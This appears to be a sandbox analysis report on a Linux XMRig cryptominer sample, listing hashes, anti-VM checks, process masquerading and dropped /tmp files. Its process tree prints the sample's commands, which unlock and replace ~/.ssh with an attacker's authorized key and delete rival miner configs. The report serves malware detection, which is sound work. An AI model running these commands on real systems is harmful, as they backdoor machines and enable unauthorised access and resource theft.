Analysis
-
max time kernel
149s -
max time network
151s -
platform
ubuntu-22.04_amd64 -
resource
ubuntu2204-amd64-20240611-en -
resource tags
arch:amd64arch:i386image:ubuntu2204-amd64-20240611-enkernel:5.15.0-105-genericlocale:en-usos:ubuntu-22.04-amd64system -
submitted
03-11-2024 20:37
General
-
Target
7a5c9606d068a16565c65aa8c5ee11ccecdc7098b91023dcfdb0c78695af4574
-
Size
2.1MB
-
MD5
1c36e8aaac825bcb9a086ecf2a471c89
-
SHA1
66cb901aadae8db4511a364024d555427d78d3f9
-
SHA256
7a5c9606d068a16565c65aa8c5ee11ccecdc7098b91023dcfdb0c78695af4574
-
SHA512
8a65ee52874ec24b4dda49e63153aec981bd310c49245f5d26592824a1ad0da52c7233c31e7a380ba1fe9aeff6f453db1345686eceafb8b6dfd80f9eef25dda1
-
SSDEEP
49152:WWD683TqbMtemJOGmHBox1Q6jtSVVO7EHsq8:J6dM3OGUCoPVs7EH8
Malware Config
Signatures
-
Xmrig family
-
Xmrig_linux family
-
xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
-
XMRig Miner payload 1 IoCs
Processes:
resource yara_rule behavioral1/memory/1592-1-0x0000000000400000-0x0000000000a65ff8-memory.dmp xmrig -
Attempts to change immutable files 6 IoCs
Modifies inode attributes on the filesystem to allow changing of immutable files.
Processes:
chattrchattrshshchattrchattrpid Process 1599 chattr 1600 chattr 1601 sh 1602 sh 1603 chattr 1605 chattr -
Checks hardware identifiers (DMI) 1 TTPs 4 IoCs
Checks DMI information which indicate if the system is a virtual machine.
Processes:
7a5c9606d068a16565c65aa8c5ee11ccecdc7098b91023dcfdb0c78695af4574description ioc Process File opened for reading /sys/devices/virtual/dmi/id/product_name 7a5c9606d068a16565c65aa8c5ee11ccecdc7098b91023dcfdb0c78695af4574 File opened for reading /sys/devices/virtual/dmi/id/board_vendor 7a5c9606d068a16565c65aa8c5ee11ccecdc7098b91023dcfdb0c78695af4574 File opened for reading /sys/devices/virtual/dmi/id/bios_vendor 7a5c9606d068a16565c65aa8c5ee11ccecdc7098b91023dcfdb0c78695af4574 File opened for reading /sys/devices/virtual/dmi/id/sys_vendor 7a5c9606d068a16565c65aa8c5ee11ccecdc7098b91023dcfdb0c78695af4574 -
Enumerates running processes
Discovers information about currently running processes on the system
-
Reads hardware information 1 TTPs 14 IoCs
Accesses system info like serial numbers, manufacturer names etc.
Processes:
7a5c9606d068a16565c65aa8c5ee11ccecdc7098b91023dcfdb0c78695af4574description ioc Process File opened for reading /sys/devices/virtual/dmi/id/product_serial 7a5c9606d068a16565c65aa8c5ee11ccecdc7098b91023dcfdb0c78695af4574 File opened for reading /sys/devices/virtual/dmi/id/chassis_serial 7a5c9606d068a16565c65aa8c5ee11ccecdc7098b91023dcfdb0c78695af4574 File opened for reading /sys/devices/virtual/dmi/id/board_name 7a5c9606d068a16565c65aa8c5ee11ccecdc7098b91023dcfdb0c78695af4574 File opened for reading /sys/devices/virtual/dmi/id/board_serial 7a5c9606d068a16565c65aa8c5ee11ccecdc7098b91023dcfdb0c78695af4574 File opened for reading /sys/devices/virtual/dmi/id/chassis_asset_tag 7a5c9606d068a16565c65aa8c5ee11ccecdc7098b91023dcfdb0c78695af4574 File opened for reading /sys/devices/virtual/dmi/id/bios_version 7a5c9606d068a16565c65aa8c5ee11ccecdc7098b91023dcfdb0c78695af4574 File opened for reading /sys/devices/virtual/dmi/id/product_uuid 7a5c9606d068a16565c65aa8c5ee11ccecdc7098b91023dcfdb0c78695af4574 File opened for reading /sys/devices/virtual/dmi/id/board_version 7a5c9606d068a16565c65aa8c5ee11ccecdc7098b91023dcfdb0c78695af4574 File opened for reading /sys/devices/virtual/dmi/id/chassis_version 7a5c9606d068a16565c65aa8c5ee11ccecdc7098b91023dcfdb0c78695af4574 File opened for reading /sys/devices/virtual/dmi/id/bios_date 7a5c9606d068a16565c65aa8c5ee11ccecdc7098b91023dcfdb0c78695af4574 File opened for reading /sys/devices/virtual/dmi/id/product_version 7a5c9606d068a16565c65aa8c5ee11ccecdc7098b91023dcfdb0c78695af4574 File opened for reading /sys/devices/virtual/dmi/id/board_asset_tag 7a5c9606d068a16565c65aa8c5ee11ccecdc7098b91023dcfdb0c78695af4574 File opened for reading /sys/devices/virtual/dmi/id/chassis_vendor 7a5c9606d068a16565c65aa8c5ee11ccecdc7098b91023dcfdb0c78695af4574 File opened for reading /sys/devices/virtual/dmi/id/chassis_type 7a5c9606d068a16565c65aa8c5ee11ccecdc7098b91023dcfdb0c78695af4574 -
Processes:
resource yara_rule behavioral1/files/fstream-1.dat upx -
Changes its process name 2 IoCs
Processes:
7a5c9606d068a16565c65aa8c5ee11ccecdc7098b91023dcfdb0c78695af4574description ioc pid Process Changes the process name, possibly in an attempt to hide itself kauditd0 1592 7a5c9606d068a16565c65aa8c5ee11ccecdc7098b91023dcfdb0c78695af4574 Changes the process name, possibly in an attempt to hide itself sshd@notty 1596 7a5c9606d068a16565c65aa8c5ee11ccecdc7098b91023dcfdb0c78695af4574 -
Checks CPU configuration 1 TTPs 1 IoCs
Checks CPU information which indicate if the system is a virtual machine.
Processes:
7a5c9606d068a16565c65aa8c5ee11ccecdc7098b91023dcfdb0c78695af4574description ioc Process File opened for reading /proc/cpuinfo 7a5c9606d068a16565c65aa8c5ee11ccecdc7098b91023dcfdb0c78695af4574 -
Reads CPU attributes 1 TTPs 45 IoCs
Processes:
7a5c9606d068a16565c65aa8c5ee11ccecdc7098b91023dcfdb0c78695af4574description ioc Process File opened for reading /sys/devices/system/cpu/cpu0/topology/cluster_cpus 7a5c9606d068a16565c65aa8c5ee11ccecdc7098b91023dcfdb0c78695af4574 File opened for reading /sys/devices/system/cpu/cpu0/cache/index1/level 7a5c9606d068a16565c65aa8c5ee11ccecdc7098b91023dcfdb0c78695af4574 File opened for reading /sys/devices/system/cpu/cpu0/cache/index3/level 7a5c9606d068a16565c65aa8c5ee11ccecdc7098b91023dcfdb0c78695af4574 File opened for reading /sys/devices/system/cpu/cpu0/cache/index9/shared_cpu_map 7a5c9606d068a16565c65aa8c5ee11ccecdc7098b91023dcfdb0c78695af4574 File opened for reading /sys/devices/system/cpu/cpu0/cache/index8/shared_cpu_map 7a5c9606d068a16565c65aa8c5ee11ccecdc7098b91023dcfdb0c78695af4574 File opened for reading /sys/devices/system/cpu/cpu0/topology/core_cpus 7a5c9606d068a16565c65aa8c5ee11ccecdc7098b91023dcfdb0c78695af4574 File opened for reading /sys/devices/system/cpu/cpu0/topology/die_cpus 7a5c9606d068a16565c65aa8c5ee11ccecdc7098b91023dcfdb0c78695af4574 File opened for reading /sys/devices/system/cpu/cpu0/cache/index1/type 7a5c9606d068a16565c65aa8c5ee11ccecdc7098b91023dcfdb0c78695af4574 File opened for reading /sys/devices/system/cpu/cpu0/cache/index2/type 7a5c9606d068a16565c65aa8c5ee11ccecdc7098b91023dcfdb0c78695af4574 File opened for reading /sys/devices/system/cpu/cpu0/cache/index3/coherency_line_size 7a5c9606d068a16565c65aa8c5ee11ccecdc7098b91023dcfdb0c78695af4574 File opened for reading /sys/devices/system/cpu/cpu0/cache/index4/shared_cpu_map 7a5c9606d068a16565c65aa8c5ee11ccecdc7098b91023dcfdb0c78695af4574 File opened for reading /sys/devices/system/cpu/cpu0/topology/physical_package_id 7a5c9606d068a16565c65aa8c5ee11ccecdc7098b91023dcfdb0c78695af4574 File opened for reading /sys/devices/system/cpu/cpu0/cache/index0/shared_cpu_map 7a5c9606d068a16565c65aa8c5ee11ccecdc7098b91023dcfdb0c78695af4574 File opened for reading /sys/devices/system/cpu/cpu0/cache/index0/id 7a5c9606d068a16565c65aa8c5ee11ccecdc7098b91023dcfdb0c78695af4574 File opened for reading /sys/devices/system/cpu/cpu0/cache/index0/physical_line_partition 7a5c9606d068a16565c65aa8c5ee11ccecdc7098b91023dcfdb0c78695af4574 File opened for reading /sys/devices/system/cpu/cpu0/cache/index2/shared_cpu_map 7a5c9606d068a16565c65aa8c5ee11ccecdc7098b91023dcfdb0c78695af4574 File opened for reading /sys/devices/system/cpu/cpu0/cache/index3/number_of_sets 7a5c9606d068a16565c65aa8c5ee11ccecdc7098b91023dcfdb0c78695af4574 File opened for reading /sys/devices/system/cpu/online 7a5c9606d068a16565c65aa8c5ee11ccecdc7098b91023dcfdb0c78695af4574 File opened for reading /sys/devices/system/cpu/cpu0/cache/index0/type 7a5c9606d068a16565c65aa8c5ee11ccecdc7098b91023dcfdb0c78695af4574 File opened for reading /sys/devices/system/cpu/cpu0/cache/index2/physical_line_partition 7a5c9606d068a16565c65aa8c5ee11ccecdc7098b91023dcfdb0c78695af4574 File opened for reading /sys/devices/system/cpu/cpu0/cache/index3/size 7a5c9606d068a16565c65aa8c5ee11ccecdc7098b91023dcfdb0c78695af4574 File opened for reading /sys/devices/system/cpu/cpu0/cache/index7/shared_cpu_map 7a5c9606d068a16565c65aa8c5ee11ccecdc7098b91023dcfdb0c78695af4574 File opened for reading /sys/devices/system/cpu/cpu0/cpufreq/cpuinfo_max_freq 7a5c9606d068a16565c65aa8c5ee11ccecdc7098b91023dcfdb0c78695af4574 File opened for reading /sys/devices/system/cpu/possible 7a5c9606d068a16565c65aa8c5ee11ccecdc7098b91023dcfdb0c78695af4574 File opened for reading /sys/devices/system/cpu/cpu0/topology/package_cpus 7a5c9606d068a16565c65aa8c5ee11ccecdc7098b91023dcfdb0c78695af4574 File opened for reading /sys/devices/system/cpu/cpu0/cache/index0/size 7a5c9606d068a16565c65aa8c5ee11ccecdc7098b91023dcfdb0c78695af4574 File opened for reading /sys/devices/system/cpu/cpu0/cache/index0/number_of_sets 7a5c9606d068a16565c65aa8c5ee11ccecdc7098b91023dcfdb0c78695af4574 File opened for reading /sys/devices/system/cpu/cpu0/cache/index1/id 7a5c9606d068a16565c65aa8c5ee11ccecdc7098b91023dcfdb0c78695af4574 File opened for reading /sys/devices/system/cpu/cpu0/cache/index2/id 7a5c9606d068a16565c65aa8c5ee11ccecdc7098b91023dcfdb0c78695af4574 File opened for reading /sys/devices/system/cpu/cpu0/cache/index3/id 7a5c9606d068a16565c65aa8c5ee11ccecdc7098b91023dcfdb0c78695af4574 File opened for reading /sys/devices/system/cpu/cpu0/cache/index0/level 7a5c9606d068a16565c65aa8c5ee11ccecdc7098b91023dcfdb0c78695af4574 File opened for reading /sys/devices/system/cpu/cpu0/cache/index1/shared_cpu_map 7a5c9606d068a16565c65aa8c5ee11ccecdc7098b91023dcfdb0c78695af4574 File opened for reading /sys/devices/system/cpu/cpu0/cache/index2/level 7a5c9606d068a16565c65aa8c5ee11ccecdc7098b91023dcfdb0c78695af4574 File opened for reading /sys/devices/system/cpu/cpu0/cache/index3/shared_cpu_map 7a5c9606d068a16565c65aa8c5ee11ccecdc7098b91023dcfdb0c78695af4574 File opened for reading /sys/devices/system/cpu/cpu0/cache/index3/physical_line_partition 7a5c9606d068a16565c65aa8c5ee11ccecdc7098b91023dcfdb0c78695af4574 File opened for reading /sys/devices/system/cpu/cpu0/cache/index6/shared_cpu_map 7a5c9606d068a16565c65aa8c5ee11ccecdc7098b91023dcfdb0c78695af4574 File opened for reading /sys/devices/system/cpu/cpu0/cache/index0/coherency_line_size 7a5c9606d068a16565c65aa8c5ee11ccecdc7098b91023dcfdb0c78695af4574 File opened for reading /sys/devices/system/cpu/cpu0/cache/index2/coherency_line_size 7a5c9606d068a16565c65aa8c5ee11ccecdc7098b91023dcfdb0c78695af4574 File opened for reading /sys/devices/system/cpu/cpu0/cache/index3/type 7a5c9606d068a16565c65aa8c5ee11ccecdc7098b91023dcfdb0c78695af4574 File opened for reading /sys/devices/system/cpu/cpu0/cache/index5/shared_cpu_map 7a5c9606d068a16565c65aa8c5ee11ccecdc7098b91023dcfdb0c78695af4574 File opened for reading /sys/devices/system/cpu/cpu0/cpu_capacity 7a5c9606d068a16565c65aa8c5ee11ccecdc7098b91023dcfdb0c78695af4574 File opened for reading /sys/devices/system/cpu/cpu0/topology/core_id 7a5c9606d068a16565c65aa8c5ee11ccecdc7098b91023dcfdb0c78695af4574 File opened for reading /sys/devices/system/cpu/cpu0/cache/index2/size 7a5c9606d068a16565c65aa8c5ee11ccecdc7098b91023dcfdb0c78695af4574 File opened for reading /sys/devices/system/cpu/cpu0/cache/index2/number_of_sets 7a5c9606d068a16565c65aa8c5ee11ccecdc7098b91023dcfdb0c78695af4574 File opened for reading /sys/devices/system/cpu/cpu0/cpufreq/base_frequency 7a5c9606d068a16565c65aa8c5ee11ccecdc7098b91023dcfdb0c78695af4574 -
Enumerates kernel/hardware configuration 1 TTPs 24 IoCs
Reads contents of /sys virtual filesystem to enumerate system information.
Processes:
7a5c9606d068a16565c65aa8c5ee11ccecdc7098b91023dcfdb0c78695af4574description ioc Process File opened for reading /sys/devices/system/node/node0/access0/initiators/read_latency 7a5c9606d068a16565c65aa8c5ee11ccecdc7098b91023dcfdb0c78695af4574 File opened for reading /sys/firmware/dmi/tables/smbios_entry_point 7a5c9606d068a16565c65aa8c5ee11ccecdc7098b91023dcfdb0c78695af4574 File opened for reading /sys/devices/system/node/node0/hugepages/hugepages-2048kB/free_hugepages 7a5c9606d068a16565c65aa8c5ee11ccecdc7098b91023dcfdb0c78695af4574 File opened for reading /sys/fs/cgroup/cgroup.controllers 7a5c9606d068a16565c65aa8c5ee11ccecdc7098b91023dcfdb0c78695af4574 File opened for reading /sys/kernel/mm/hugepages/hugepages-1048576kB/nr_hugepages 7a5c9606d068a16565c65aa8c5ee11ccecdc7098b91023dcfdb0c78695af4574 File opened for reading /sys/devices/system/node/node0/hugepages/hugepages-2048kB/nr_hugepages 7a5c9606d068a16565c65aa8c5ee11ccecdc7098b91023dcfdb0c78695af4574 File opened for reading /sys/devices/system/node/node0/access1/initiators 7a5c9606d068a16565c65aa8c5ee11ccecdc7098b91023dcfdb0c78695af4574 File opened for reading /sys/devices/system/node/node0/access0/initiators 7a5c9606d068a16565c65aa8c5ee11ccecdc7098b91023dcfdb0c78695af4574 File opened for reading /sys/devices/system/node/node0/access0/initiators/read_bandwidth 7a5c9606d068a16565c65aa8c5ee11ccecdc7098b91023dcfdb0c78695af4574 File opened for reading /sys/firmware/dmi/tables/DMI 7a5c9606d068a16565c65aa8c5ee11ccecdc7098b91023dcfdb0c78695af4574 File opened for reading /sys/kernel/mm/hugepages 7a5c9606d068a16565c65aa8c5ee11ccecdc7098b91023dcfdb0c78695af4574 File opened for reading /sys/devices/system/node/node0/cpumap 7a5c9606d068a16565c65aa8c5ee11ccecdc7098b91023dcfdb0c78695af4574 File opened for reading /sys/bus/dax/devices 7a5c9606d068a16565c65aa8c5ee11ccecdc7098b91023dcfdb0c78695af4574 File opened for reading /sys/devices/system/node/node0/hugepages/hugepages-1048576kB/nr_hugepages 7a5c9606d068a16565c65aa8c5ee11ccecdc7098b91023dcfdb0c78695af4574 File opened for reading /sys/devices/system/node/node0/access0/initiators/write_latency 7a5c9606d068a16565c65aa8c5ee11ccecdc7098b91023dcfdb0c78695af4574 File opened for reading /sys/kernel/mm/hugepages/hugepages-2048kB/nr_hugepages 7a5c9606d068a16565c65aa8c5ee11ccecdc7098b91023dcfdb0c78695af4574 File opened for reading /sys/devices/system/node/online 7a5c9606d068a16565c65aa8c5ee11ccecdc7098b91023dcfdb0c78695af4574 File opened for reading /sys/devices/system/node/node0/meminfo 7a5c9606d068a16565c65aa8c5ee11ccecdc7098b91023dcfdb0c78695af4574 File opened for reading /sys/devices/system/node/node0/hugepages 7a5c9606d068a16565c65aa8c5ee11ccecdc7098b91023dcfdb0c78695af4574 File opened for reading /sys/devices/system/node/node0/access0/initiators/write_bandwidth 7a5c9606d068a16565c65aa8c5ee11ccecdc7098b91023dcfdb0c78695af4574 File opened for reading /sys/fs/cgroup/cpuset.cpus.effective 7a5c9606d068a16565c65aa8c5ee11ccecdc7098b91023dcfdb0c78695af4574 File opened for reading /sys/fs/cgroup/cpuset.mems.effective 7a5c9606d068a16565c65aa8c5ee11ccecdc7098b91023dcfdb0c78695af4574 File opened for reading /sys/devices/system/cpu 7a5c9606d068a16565c65aa8c5ee11ccecdc7098b91023dcfdb0c78695af4574 File opened for reading /sys/devices/virtual/dmi/id 7a5c9606d068a16565c65aa8c5ee11ccecdc7098b91023dcfdb0c78695af4574 -
Processes:
7a5c9606d068a16565c65aa8c5ee11ccecdc7098b91023dcfdb0c78695af4574description ioc Process File opened for reading /proc/1198/cmdline 7a5c9606d068a16565c65aa8c5ee11ccecdc7098b91023dcfdb0c78695af4574 File opened for reading /proc/1404/cmdline 7a5c9606d068a16565c65aa8c5ee11ccecdc7098b91023dcfdb0c78695af4574 File opened for reading /proc/1527/cmdline 7a5c9606d068a16565c65aa8c5ee11ccecdc7098b91023dcfdb0c78695af4574 File opened for reading /proc/10/cmdline 7a5c9606d068a16565c65aa8c5ee11ccecdc7098b91023dcfdb0c78695af4574 File opened for reading /proc/109/cmdline 7a5c9606d068a16565c65aa8c5ee11ccecdc7098b91023dcfdb0c78695af4574 File opened for reading /proc/215/cmdline 7a5c9606d068a16565c65aa8c5ee11ccecdc7098b91023dcfdb0c78695af4574 File opened for reading /proc/744/cmdline 7a5c9606d068a16565c65aa8c5ee11ccecdc7098b91023dcfdb0c78695af4574 File opened for reading /proc/311/cmdline 7a5c9606d068a16565c65aa8c5ee11ccecdc7098b91023dcfdb0c78695af4574 File opened for reading /proc/605/cmdline 7a5c9606d068a16565c65aa8c5ee11ccecdc7098b91023dcfdb0c78695af4574 File opened for reading /proc/752/cmdline 7a5c9606d068a16565c65aa8c5ee11ccecdc7098b91023dcfdb0c78695af4574 File opened for reading /proc/776/cmdline 7a5c9606d068a16565c65aa8c5ee11ccecdc7098b91023dcfdb0c78695af4574 File opened for reading /proc/mounts 7a5c9606d068a16565c65aa8c5ee11ccecdc7098b91023dcfdb0c78695af4574 File opened for reading /proc/6/cmdline 7a5c9606d068a16565c65aa8c5ee11ccecdc7098b91023dcfdb0c78695af4574 File opened for reading /proc/17/cmdline 7a5c9606d068a16565c65aa8c5ee11ccecdc7098b91023dcfdb0c78695af4574 File opened for reading /proc/97/cmdline 7a5c9606d068a16565c65aa8c5ee11ccecdc7098b91023dcfdb0c78695af4574 File opened for reading /proc/979/cmdline 7a5c9606d068a16565c65aa8c5ee11ccecdc7098b91023dcfdb0c78695af4574 File opened for reading /proc/986/cmdline 7a5c9606d068a16565c65aa8c5ee11ccecdc7098b91023dcfdb0c78695af4574 File opened for reading /proc/1418/cmdline 7a5c9606d068a16565c65aa8c5ee11ccecdc7098b91023dcfdb0c78695af4574 File opened for reading /proc/26/cmdline 7a5c9606d068a16565c65aa8c5ee11ccecdc7098b91023dcfdb0c78695af4574 File opened for reading /proc/1580/cmdline 7a5c9606d068a16565c65aa8c5ee11ccecdc7098b91023dcfdb0c78695af4574 File opened for reading /proc/1582/cmdline 7a5c9606d068a16565c65aa8c5ee11ccecdc7098b91023dcfdb0c78695af4574 File opened for reading /proc/sys/vm/nr_hugepages 7a5c9606d068a16565c65aa8c5ee11ccecdc7098b91023dcfdb0c78695af4574 File opened for reading /proc/11/cmdline 7a5c9606d068a16565c65aa8c5ee11ccecdc7098b91023dcfdb0c78695af4574 File opened for reading /proc/74/cmdline 7a5c9606d068a16565c65aa8c5ee11ccecdc7098b91023dcfdb0c78695af4574 File opened for reading /proc/214/cmdline 7a5c9606d068a16565c65aa8c5ee11ccecdc7098b91023dcfdb0c78695af4574 File opened for reading /proc/644/cmdline 7a5c9606d068a16565c65aa8c5ee11ccecdc7098b91023dcfdb0c78695af4574 File opened for reading /proc/1457/cmdline 7a5c9606d068a16565c65aa8c5ee11ccecdc7098b91023dcfdb0c78695af4574 File opened for reading /proc/18/cmdline 7a5c9606d068a16565c65aa8c5ee11ccecdc7098b91023dcfdb0c78695af4574 File opened for reading /proc/590/cmdline 7a5c9606d068a16565c65aa8c5ee11ccecdc7098b91023dcfdb0c78695af4574 File opened for reading /proc/837/cmdline 7a5c9606d068a16565c65aa8c5ee11ccecdc7098b91023dcfdb0c78695af4574 File opened for reading /proc/1156/cmdline 7a5c9606d068a16565c65aa8c5ee11ccecdc7098b91023dcfdb0c78695af4574 File opened for reading /proc/308/cmdline 7a5c9606d068a16565c65aa8c5ee11ccecdc7098b91023dcfdb0c78695af4574 File opened for reading /proc/1284/cmdline 7a5c9606d068a16565c65aa8c5ee11ccecdc7098b91023dcfdb0c78695af4574 File opened for reading /proc/1080/cmdline 7a5c9606d068a16565c65aa8c5ee11ccecdc7098b91023dcfdb0c78695af4574 File opened for reading /proc/1620/cmdline 7a5c9606d068a16565c65aa8c5ee11ccecdc7098b91023dcfdb0c78695af4574 File opened for reading /proc/213/cmdline 7a5c9606d068a16565c65aa8c5ee11ccecdc7098b91023dcfdb0c78695af4574 File opened for reading /proc/222/cmdline 7a5c9606d068a16565c65aa8c5ee11ccecdc7098b91023dcfdb0c78695af4574 File opened for reading /proc/408/cmdline 7a5c9606d068a16565c65aa8c5ee11ccecdc7098b91023dcfdb0c78695af4574 File opened for reading /proc/589/cmdline 7a5c9606d068a16565c65aa8c5ee11ccecdc7098b91023dcfdb0c78695af4574 File opened for reading /proc/1396/cmdline 7a5c9606d068a16565c65aa8c5ee11ccecdc7098b91023dcfdb0c78695af4574 File opened for reading /proc/497/cmdline 7a5c9606d068a16565c65aa8c5ee11ccecdc7098b91023dcfdb0c78695af4574 File opened for reading /proc/628/cmdline 7a5c9606d068a16565c65aa8c5ee11ccecdc7098b91023dcfdb0c78695af4574 File opened for reading /proc/766/cmdline 7a5c9606d068a16565c65aa8c5ee11ccecdc7098b91023dcfdb0c78695af4574 File opened for reading /proc/1085/cmdline 7a5c9606d068a16565c65aa8c5ee11ccecdc7098b91023dcfdb0c78695af4574 File opened for reading /proc/602/cmdline 7a5c9606d068a16565c65aa8c5ee11ccecdc7098b91023dcfdb0c78695af4574 File opened for reading /proc/1101/cmdline 7a5c9606d068a16565c65aa8c5ee11ccecdc7098b91023dcfdb0c78695af4574 File opened for reading /proc/1120/cmdline 7a5c9606d068a16565c65aa8c5ee11ccecdc7098b91023dcfdb0c78695af4574 File opened for reading /proc/1194/cmdline 7a5c9606d068a16565c65aa8c5ee11ccecdc7098b91023dcfdb0c78695af4574 File opened for reading /proc/217/cmdline 7a5c9606d068a16565c65aa8c5ee11ccecdc7098b91023dcfdb0c78695af4574 File opened for reading /proc/220/cmdline 7a5c9606d068a16565c65aa8c5ee11ccecdc7098b91023dcfdb0c78695af4574 File opened for reading /proc/223/cmdline 7a5c9606d068a16565c65aa8c5ee11ccecdc7098b91023dcfdb0c78695af4574 File opened for reading /proc/582/cmdline 7a5c9606d068a16565c65aa8c5ee11ccecdc7098b91023dcfdb0c78695af4574 File opened for reading /proc/1306/cmdline 7a5c9606d068a16565c65aa8c5ee11ccecdc7098b91023dcfdb0c78695af4574 File opened for reading /proc/216/cmdline 7a5c9606d068a16565c65aa8c5ee11ccecdc7098b91023dcfdb0c78695af4574 File opened for reading /proc/221/cmdline 7a5c9606d068a16565c65aa8c5ee11ccecdc7098b91023dcfdb0c78695af4574 File opened for reading /proc/409/cmdline 7a5c9606d068a16565c65aa8c5ee11ccecdc7098b91023dcfdb0c78695af4574 File opened for reading /proc/1127/cmdline 7a5c9606d068a16565c65aa8c5ee11ccecdc7098b91023dcfdb0c78695af4574 File opened for reading /proc/523/cmdline 7a5c9606d068a16565c65aa8c5ee11ccecdc7098b91023dcfdb0c78695af4574 File opened for reading /proc/771/cmdline 7a5c9606d068a16565c65aa8c5ee11ccecdc7098b91023dcfdb0c78695af4574 File opened for reading /proc/1027/cmdline 7a5c9606d068a16565c65aa8c5ee11ccecdc7098b91023dcfdb0c78695af4574 File opened for reading /proc/1032/cmdline 7a5c9606d068a16565c65aa8c5ee11ccecdc7098b91023dcfdb0c78695af4574 File opened for reading /proc/12/cmdline 7a5c9606d068a16565c65aa8c5ee11ccecdc7098b91023dcfdb0c78695af4574 File opened for reading /proc/24/cmdline 7a5c9606d068a16565c65aa8c5ee11ccecdc7098b91023dcfdb0c78695af4574 File opened for reading /proc/98/cmdline 7a5c9606d068a16565c65aa8c5ee11ccecdc7098b91023dcfdb0c78695af4574 -
Writes file to tmp directory 3 IoCs
Malware often drops required files in the /tmp directory.
Processes:
7a5c9606d068a16565c65aa8c5ee11ccecdc7098b91023dcfdb0c78695af4574description ioc Process File opened for modification /tmp/.kswapd00 7a5c9606d068a16565c65aa8c5ee11ccecdc7098b91023dcfdb0c78695af4574 File opened for modification /tmp/cert_key.pem 7a5c9606d068a16565c65aa8c5ee11ccecdc7098b91023dcfdb0c78695af4574 File opened for modification /tmp/cert.pem 7a5c9606d068a16565c65aa8c5ee11ccecdc7098b91023dcfdb0c78695af4574
Processes
-
/tmp/7a5c9606d068a16565c65aa8c5ee11ccecdc7098b91023dcfdb0c78695af4574/tmp/7a5c9606d068a16565c65aa8c5ee11ccecdc7098b91023dcfdb0c78695af45741⤵
- Checks hardware identifiers (DMI)
- Reads hardware information
- Changes its process name
- Checks CPU configuration
- Reads CPU attributes
- Enumerates kernel/hardware configuration
- Reads runtime system information
- Writes file to tmp directory
PID:1592 -
/bin/shsh -c "sh -c 'chattr -ia ~/.ssh; cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~; chattr +ia ~/.ssh' >> /dev/null 2>&1"2⤵PID:1597
-
/usr/bin/shsh -c "chattr -ia ~/.ssh; cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~; chattr +ia ~/.ssh"3⤵PID:1598
-
/usr/bin/chattrchattr -ia "~/.ssh"4⤵
- Attempts to change immutable files
PID:1599
-
-
/usr/bin/chattrchattr +ia "~/.ssh"4⤵
- Attempts to change immutable files
PID:1600
-
-
-
-
/bin/shsh -c "sh -c 'chattr -ia ~/.xmrig.json;lockr -ia ~/.xmrig.json; rm -rf ~/.xmrig.json; chattr -ia ~/.config/xmrig.json; lockr -ia ~/.config/xmrig.json; rm -rf ~/.config/xmrig.json' >>/dev/null 2>&1"2⤵
- Attempts to change immutable files
PID:1601 -
/usr/bin/shsh -c "chattr -ia ~/.xmrig.json;lockr -ia ~/.xmrig.json; rm -rf ~/.xmrig.json; chattr -ia ~/.config/xmrig.json; lockr -ia ~/.config/xmrig.json; rm -rf ~/.config/xmrig.json"3⤵
- Attempts to change immutable files
PID:1602 -
/usr/bin/chattrchattr -ia "~/.xmrig.json"4⤵
- Attempts to change immutable files
PID:1603
-
-
/usr/bin/rmrm -rf "~/.xmrig.json"4⤵PID:1604
-
-
/usr/bin/chattrchattr -ia "~/.config/xmrig.json"4⤵
- Attempts to change immutable files
PID:1605
-
-
/usr/bin/rmrm -rf "~/.config/xmrig.json"4⤵PID:1606
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1KB
MD50b151af7e825dd40f68738ad7bcd2354
SHA1954550d2b110c7c569bb270c00f2f65a2edaaa86
SHA2561c1d89ef53fbad35266e9c197c0d009f55530ca90e80ebca7ef0ae5802824ff3
SHA512051bee04373007683f7fdd758f648fb5f19acd1f84b2cbd9baf470f8645c8b58cb54e14d3bd2062169583801297772b370b1b3805bbead52ff9efac559677bbf
-
Filesize
2.1MB
MD51c36e8aaac825bcb9a086ecf2a471c89
SHA166cb901aadae8db4511a364024d555427d78d3f9
SHA2567a5c9606d068a16565c65aa8c5ee11ccecdc7098b91023dcfdb0c78695af4574
SHA5128a65ee52874ec24b4dda49e63153aec981bd310c49245f5d26592824a1ad0da52c7233c31e7a380ba1fe9aeff6f453db1345686eceafb8b6dfd80f9eef25dda1
-
Filesize
5B
MD5f04818cf834a1e3bd2c4325e4c8dff32
SHA113901419c5f00d545d998312ec748fc7517d2530
SHA256a0105311c47cdc36086fb89f65704198e5b64961c2057c6d8cbf7c70d6816bac
SHA512efb1697afb0ef9c209415030e8d95d92ca607aecca06585c99acd3fd63ad95028fc7c47d49d59dbd1a2ce8bca2f14788131ace82193c8565fd2f9362d22813c9